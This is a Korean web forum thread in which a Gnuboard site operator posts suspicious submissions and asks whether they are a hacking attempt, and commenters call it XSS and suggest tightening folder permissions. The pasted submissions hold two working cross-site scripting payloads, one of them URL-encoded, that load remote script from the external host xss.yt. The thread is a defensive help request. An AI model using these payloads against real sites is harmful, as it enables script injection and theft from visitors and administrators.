해킹 시도인가? 정보
해킹 시도인가?본문
안녕하세요.
제가 운영하는 사이트 게시판에
요 며칠동안 2번의 이상한 글이 올라왔는데.
아래와 같은 소스가 있습니다.
해킹 시도 인가요?
그누보드 최신으로 업데이트 해 둬서 아직 뚫린것 같진 않은데..
어떻게 조치하는게 좋을까요?
. </tExtArEa>'"><sCRiPt sRC=//xss.yt/Y67I></sCrIpT>
</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eRequest::post(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22https%3A%2F%2Fxss.yt%2FY67I%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
추천
1
1
댓글 8개
xss랑 웹킷인가 공격 당하는것 같아요
일단 data 폴더 권한부터 강화하시고 외부에 파일업로드 못하게 막아놓으세요
일단 data 폴더 권한부터 강화하시고 외부에 파일업로드 못하게 막아놓으세요
@리오닥터 의견 감사합니다. 혹시 괜찮으시면.
data 폴더 권한강화라고 하시면 data 권한을 어떻게 줘야하는건가요?
그 밑에 폴더들도 함께 줘야하는 건지? 특정 폴더만 주는건지? 755로 줘야 하는건지?
잘 몰라서 그런데 조금만 구체적으로 설명 해 주실 수 있을까요?
data 폴더 권한강화라고 하시면 data 권한을 어떻게 줘야하는건가요?
그 밑에 폴더들도 함께 줘야하는 건지? 특정 폴더만 주는건지? 755로 줘야 하는건지?
잘 몰라서 그런데 조금만 구체적으로 설명 해 주실 수 있을까요?
@리오닥터 정말 잘 정리된 곳을 알려주셔서 감사합니다.
권한 설정및 방법은 알고 있습니다.
제가 궁금한 것은 어떤 디렉토리를 변경하면 될까요?
1) data 폴더만?
2) data 폴더와 그 아래 폴더 전체?
3) data 안의 특정폴더?
4) data 안의 특정 파일?
권한 설정및 방법은 알고 있습니다.
제가 궁금한 것은 어떤 디렉토리를 변경하면 될까요?
1) data 폴더만?
2) data 폴더와 그 아래 폴더 전체?
3) data 안의 특정폴더?
4) data 안의 특정 파일?
인터넷이 익명성때문에 오만가지 시도들을 다하네요. 전세계 인터넷을 고정아이피화 해서 해킹시도하는 인간들 잡았으면 좋겠어요.
@크론이 그러게요. 왜 절 괴롭히는지..ㅠㅠ
진짜 짜중 나시겠네요. 커피 한잔 드세요.
@비타주리 넵, 사이트가 성장하려니까..이제 슬슬 견제 들어오는건지...? 신경쓰이긴 하네요.
의견 감사합니다.
의견 감사합니다.